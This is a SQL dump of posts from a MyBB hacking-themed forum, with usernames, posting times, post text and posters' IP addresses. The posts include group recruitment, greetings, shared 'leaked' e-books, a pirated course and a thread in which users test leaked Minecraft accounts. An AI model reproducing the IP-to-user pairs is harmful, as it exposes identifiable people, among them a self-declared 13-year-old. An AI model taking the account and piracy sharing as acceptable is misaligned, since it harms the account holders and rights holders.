'5a3ef8e80d1ff61533b189aaf8602224', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6346', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '62', 'R?????zo?', '1351155038', 'kinda nice contest, I will not participate though since I don\'t eat chocolates :P', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', 'e6cad6af6ab05dfda2fa00f426500b8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6347', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1351155133', 'you could have changed the userbar already :P', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', '2b2c61cb9316c32a768b4b7754fc0b5f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6348', '1094', '0', '58', 'The Marketers - Official Recruitment | Join us Today !', '0', '228', 'VirtualLegend', '1351155294', '[size=medium][color=#32CD32]Hello L33thacking Members,[/color] Today is the first requitment of the new official group \'Marketers\'. [color=#FF0000]Don\'t PM just Post the format below to request your application![/color] [color=#32CD32]Requirements:[/color] * Must Have Atleast More than 75 Posts * Must Have Atleast More than 5+ Reputation * Must Have Experience of Online money making * Must be a active member with High Quality Posts/Threads [color=#32CD32]The Marketers Usberbar (Made by Reloadzor):[/color] [img]http://i.imgur.com/ifvO7.gif[/img] [color=#32CD32]The Marketers Palace Forum Icon:[/color] [img]http://i.imgur.com/uP3eg.png[/img] [color=#FF0000]Signature: Coming Soon ![/color] [u][b]Please Fill In The Application Completely:[/b][/u] [code][b]Username:[/b] [b]Age:[/b] [b]Is your English spelling/grammar good?: [/b] [b]How many Experience do you have with making money online?:[/b] [b]What for methods do you use?:[/b] [b]Do you succeed more than you fail, or not?:[/b] [b]Explain Why you want to join the group:[/b] [b]Profile Link:[/b][/code] [color=#FFD700]Have a Nice Day :P[/color] [/size]', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'bf92269fbf30dac39e71ebfdb8e770e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6349', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '228', 'VirtualLegend', '1351155658', 'Lmao Or you could make a LH Group called Womanizer :P', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'f8de707d2e5ac4ca3bbe679e771976d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6350', '1093', '6341', '7', 'RE: I\'m back', '0', '222', 'Exposé', '1351155678', 'lol welcome back.... hopefully cloudflare stops actin up', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'de721f7fe830d932a4eaed51b8df10a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6351', '1083', '6300', '4', 'RE: Hey Guys', '0', '228', 'VirtualLegend', '1351155909', 'Wassup Jacob, I think you will like it here :P', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'df02dc7026477389caf9a424cad49f24', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6352', '1093', '6341', '7', 'RE: I\'m back', '0', '228', 'VirtualLegend', '1351155988', 'lmao stupid cloudflare', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '83ad8dbc2ce13480894cc3f34dfebf95', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6353', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '228', 'VirtualLegend', '1351156066', 'I have refered two people Yeah', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '1a811b8f98164c37f88512794ffcaba9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6354', '1095', '0', '8', 'Azz & Tittiez', '0', '228', 'VirtualLegend', '1351156575', '[align=left]The Song is made by The Three 6 Mafia, and it\'s called Azz And Tittiez. The Song is used in the new film \'The Campaign\'. The movie made a f*king Hilarious scene. Go and check it out. You can see the movie on solarmovie.eu IN HD quality. Song: [video=youtube]http://www.youtube.com/watch?v=46CY-QFcxxY[/video][/align]', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'ae6ea133361bd3b887427f9eb4115acf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6355', '1095', '6354', '8', 'RE: Azz & Tittiez', '0', '257', 'XxTREYZxX', '1351157708', 'Thats a nice song,Thanks for the great share :P', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '2c6fce952248c3bf950549369d0da2f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6356', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351158038', '6/10 considering it is some Asian chick hahah lol', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '5dda804c6fe77c7ba2838e47232ea7c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6357', '1096', '0', '7', 'Leaked e-book Pack [Lot\'s of stuff]', '0', '257', 'XxTREYZxX', '1351158423', 'hello this is a leaked e-book pack, It has many ebooks on viruses and ethical hacking. here it is: http://j.gs/1720852/ebookpack there you go password: ebad112', '203.104.11.11', '-882373877', '1', '0', '61', '1351200214', '1', 'ed1bd99a8e63d063624db8dee7601540', '0', '1351200214'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6358', '1097', '0', '9', 'Monetizing e-book', '0', '257', 'XxTREYZxX', '1351158574', 'hey LH this is a e-book leaked by me for neobux 8$ a day. link:http://www.filemsg.com/p5pq5xqr657t hope you enjoy', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '338f44ab8262a121ef6859b7c5923e06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6359', '1096', '6357', '7', 'RE: Leaked e-book', '0', '228', 'VirtualLegend', '1351159532', 'I don\'t know about you, but do you want to download a file without any information. Or virusscan,proof.', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'fa3b2564e01bb6417347527dfeb26081', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6360', '1083', '6300', '4', 'RE: Hey Guys', '0', '62', 'R?????zo?', '1351161221', 'Welcome :) Enjoy your stay, stay active and HQ.', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', '0cfe90dfcfc4b8c40b120f36a5f27174', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6361', '1096', '6357', '7', 'RE: Leaked e-book', '0', '205', 'mothered', '1351166044', 'Agree. At least some sort of description, should be posted.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '900b8ed5c41a83fbd90db90a03a45b5e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6362', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '228', 'VirtualLegend', '1351166243', 'Nice Share, but there are no accounts working', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '88fd1d8ceed1df922317ed91b001edb8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6363', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '61', 'NXK', '1351166656', 'I like this idea too, Ill talk to joker about it later today :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'da41f5eec8b3ff6b965be0efd975299b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6364', '1096', '6357', '7', 'RE: Leaked e-book', '0', '61', 'NXK', '1351166733', '\"Leaked ebook\" You need to provide information in the thread. No one knows what he ebook is about.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'fcad1ccd21194543308f40830091a16e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6365', '613', '6347', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1351167089', '[quote=\'R?????zo?\' pid=\'6347\' dateline=\'1351155133\'] you could have changed the userbar already :P [/quote] Joker is in charge of groups I\'m not. So when he\'s not busy it will be done.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '2fb5805aa8fe202dc61344ab23d9d338', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6366', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '205', 'mothered', '1351167482', 'And there\'s so many people who judge the homeless. Perhaps they should see this.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '705abb99232dde2a3e9799079619bb5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6368', '1095', '6354', '8', 'RE: Azz & Tittiez', '0', '205', 'mothered', '1351167973', 'I also like their other song called \"It\'s a fight\", which was featured In Rocky 6 (the final fight). Nice contribution.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '2682cb992f890ef537dbb06d55c08d83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6369', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '62', 'R?????zo?', '1351168993', '[b]Username:[/b] R?????zo? [b]Age:[/b] 20 [b]Is your English spelling/grammar good?: [/b]Yes, even though it\'s my 2nd language. [b]How many Experience do you have with making money online?:[/b] Nearly 1year. [b]What for methods do you use?:[/b] Lately PPD and PPC :/ [b]Do you succeed more than you fail, or not?:[/b] I usually succed, but I\'ve failed before (who didn\'t) [b]Explain Why you want to join the group:[/b] I\'d like to learn some more about monetizing online and of course help/share some methods. [b]Profile Link:[/b] http://l33thacking.net/user-62.html', '89.214.9.182', '1507199414', '1', '0', '0', '0', '1', 'c068353ca0191c8734ef256d7cb37ed1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6370', '1059', '6092', '9', 'RE: new ptc site with more earning option', '0', '53', 'sirchamp', '1351174019', 'thanks for the link. But stop it with these link shortening shite.', '218.142.131.26', '-628194534', '1', '0', '0', '0', '1', 'd4bfc31a8f8bc2c3047e61cf0c3be190', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6371', '1094', '6369', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '228', 'VirtualLegend', '1351177002', '[quote=\'R?????zo?\' pid=\'6369\' dateline=\'1351168993\'] [b]Username:[/b] R?????zo? [b]Age:[/b] 20 [b]Is your English spelling/grammar good?: [/b]Yes, even though it\'s my 2nd language. [b]How many Experience do you have with making money online?:[/b] Nearly 1year. [b]What for methods do you use?:[/b] Lately PPD and PPC :/ [b]Do you succeed more than you fail, or not?:[/b] I usually succed, but I\'ve failed before (who didn\'t) [b]Explain Why you want to join the group:[/b] I\'d like to learn some more about monetizing online and of course help/share some methods. [b]Profile Link:[/b] http://l33thacking.net/user-62.html [/quote] Welcome To the Group Bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '147af6358ac874d20b7a30ec21399e73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6372', '1076', '6297', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '61', 'NXK', '1351178958', '[quote=\'iTzIpod\' pid=\'6297\' dateline=\'1351118410\'] Nevermind. Just downloaded it, scanned with MalwareBytes, and got no malicious items. Thanks! :D Installed all of them. [/quote] .. They\'re fonts. No need for a virus scan.', '99.252.235.12', '1677519628', '1', '0', '61', '1351179031', '1', 'b294c2d741339ebfa5cfb3f96a00e74d', '0', '1351179031'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6373', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '258', 'PiXEL^OG', '1351182513', 'THIS . IS . AWESOME!!! Thanks for this epic pack <3', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '873216339ca5611885012099bafa01b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6374', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '62', 'R?????zo?', '1351183322', 'Thanks for accepting me :)', '5.43.42.33', '86714913', '1', '0', '0', '0', '1', 'bc286840222facee88a6740fd0995c93', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6375', '1098', '0', '9', 'CPA Headhunters - Learn How To Make Bank', '0', '228', 'VirtualLegend', '1351192844', '[align=center][img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part1.png[/img] [img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part2.png[/img] [img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part3.png[/img] [img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part4.png[/img] [img]http://cpaheadhunters.com/wp-content/uploads/2012/05/juni1.png[/img] [size=medium][color=#FF0000]So what is here for you?[/color][/size] A complete blueprint video course over my shoulder that will show you exactly how do I work to make a killing with CPA. This video course is based on 10 modules. Each module has from 1-3 videos. I have also included 2 bonus moduels for you to give you more ideas, and a new income stream. Newbie Friendly System Step-By-Step. Master a New Traffic Source. Make 100%-400% ROI. Low Competition (CPC range $0.03-$0.10). Start Advertising With as Low as $25. Find a Winner Campaign For $5 Testing. Use Direct Linking Or Landing Page. Instant ads approval ( No More Struggle ) Learn How To Optimize & Scale Your Campaigns. Email and Skype Support. Much, Much More. [color=#FF0000][size=medium]Please Don\'t buy if you are:[/size][/color] - Not going to take action - Feel that this course is not for you - Afraid of losing money - Also if this is your last money, because I don\'t want to take your last dime [img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part6.png[/img] [img]http://cpaheadhunters.com/wp-content/uploads/2012/06/part5.png[/img][/align] [code]https://www.dropbox.com/sh/pf5beplnhgppvn1/j5V4NID6pa[/code]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '9566755d2936c318446cbd9637fd8b20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6376', '1084', '6311', '4', 'RE: hey guys', '0', '82', 'iTzIpod', '1351197376', 'Welcome to L33tHacking! :) Enjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7b7005b7e214284db10d9ab3bc238e80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6377', '1098', '6375', '9', 'RE: CPA Headhunters - Learn How To Make Bank', '0', '62', 'R?????zo?', '1351197440', 'Thanks for this, looks great. Downloading and will check it out later.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '428e1290638254c6bca164422fbaaebe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6378', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1351197691', 'Pssh. It\'s kinda LQ (Some of the threads and posts) Like for example the thread names from Trey... I don\'t like the fact that his grammar and spelling is bad. I told him countless times to fix it and he\'s like \"okay.\" Without starting with a capital O for \"Okay\" or whatsoever. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8a29ece4d22d9d9702b7f4834bdbfb7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6379', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1351197735', 'Check out the recruitment thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cbdcf572e9ce02ad691c4982cd973f78', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6380', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '82', 'iTzIpod', '1351197785', 'I don\'t really need this. But I\'ll try to refer some members.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '88d7e9e0feb94f5338390778b02938f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6381', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351197815', '1/10. Kinda hard to read.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '602a4ad34f90184ec34dca181a09e83a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6382', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '82', 'iTzIpod', '1351197885', '@VirtualLegend they\'re accounts are working. Try like the accounts on the first page. Some of them work. I tried it. But no one can change the password or email since the Security Questions are unknown', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '56b1b9aa231f38a2c9d3a1e5c9ba4e54', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6383', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '82', 'iTzIpod', '1351197922', 'I don\'t really like the idea. Kinda like the Off Topic Section.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '93c4d323fb7fd918b440b2c6d33f33da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6384', '1096', '6357', '7', 'RE: Leaked e-book', '0', '82', 'iTzIpod', '1351198001', 'Change the title to what it\'s about. Add some proof that it\'s not infected. (Download it and provide a Virus Scan) Add a picture with a Notepad program active and the eBook name etc. And on the Notepad make it say L33tHacking.net XxTREYZxX /Request Closed/Junked. LQ post. OP is really LQ too... :/', '24.212.197.164', '416597412', '1', '0', '82', '1351198032', '1', 'fb97bc1dfc6406a5ac9060f1d912b129', '0', '1351198032'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6385', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '82', 'iTzIpod', '1351198100', 'Posting... Waiting for the advertisement to finish. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '051a11bc17a1bf3e29fa069ad9555aa2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6386', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '82', 'iTzIpod', '1351198461', '[b]Username:[/b] iTzIpod [b]Age:[/b] 13 [b]Is your English spelling/grammar good?: [/b] Yes. (Better than TREYZ) -.- [b]How many Experience do you have with making money online?:[/b] Not much. It\'s even. [b]What for methods do you use?:[/b] Pay per click and PPD [b]Do you succeed more than you fail, or not?:[/b] I made $12 using my niche today. ($12/day I guess) Usually 50 cents a day on PPC [b]Explain Why you want to join the group:[/b] I want to join the Marketers group because then I can share my methods and learn from other\'s methods and all. [b]Profile Link:[/b] http://l33thacking.net/user-82.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e5ec81200824b6e040c3a4539038cf1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6387', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '2', 'Apathy', '1351203361', 'And he used to be a crip. So props to him for helping a police officer.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '99e7737db9b49a0014cca621239d2efc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6388', '1094', '6348', '58', 'RE: The Marketers - Official Recruitment | Join us Today !', '0', '222', 'Exposé', '1351204937', '[b]Username:[/b] Exposé [b]Age:[/b] 18 [b]Is your English spelling/grammar good?: [/b] Online I don\'t give a fuck, but I\'m a great writer. [b]How many Experience do you have with making money online?:[/b] I have tons of experience making money online, inlucluding GPT\'s, advertising networks, SE\'ing, ebay, etc. [b]What for methods do you use?:[/b] SE\'ing and GPT [b]Do you succeed more than you fail, or not?:[/b] I win bitch...failing is for pussies [b]Explain Why you want to join the group:[/b] Because I probably make more than any of you online and deserve to be in the group. And I can share some of my methods here aswell [b]Profile Link:[/b]', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ed7d3452932645a33505f441e6ab0644', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6389', '1096', '6357', '7', 'RE: Leaked e-book Pack [Lot\'s of stuff]', '0', '257', 'XxTREYZxX', '1351206869', 'Yeah you dont have to download it guys because i dont know how to do a virus scan :P', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'b9b30a34a1ae19e9ff3746658209853e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6390', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351207056', '0/10 because its broken and there is no pic \"P', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'c6d5a5be35cb9fecc5f697d3a279ec01', '0', '0'); INSERT INTO `mybb_posts` (`pid`, 